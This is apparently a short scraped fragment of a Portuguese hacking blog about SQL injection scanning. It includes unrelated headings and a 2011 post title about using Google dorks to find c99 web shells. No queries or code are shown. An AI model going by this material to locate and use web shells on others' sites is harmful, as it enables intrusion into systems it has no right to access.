SCANNER SQLI ONLINE - GOOGLE INURL BRASIL

O que você sabe sobre o Wikileaks?

Google Cloud Connect é um plugin grátis que leva o Google Docs ao Microsoft Office do Windows.

domingo, 20 de fevereiro de 2011

Dork hacking para busca de c99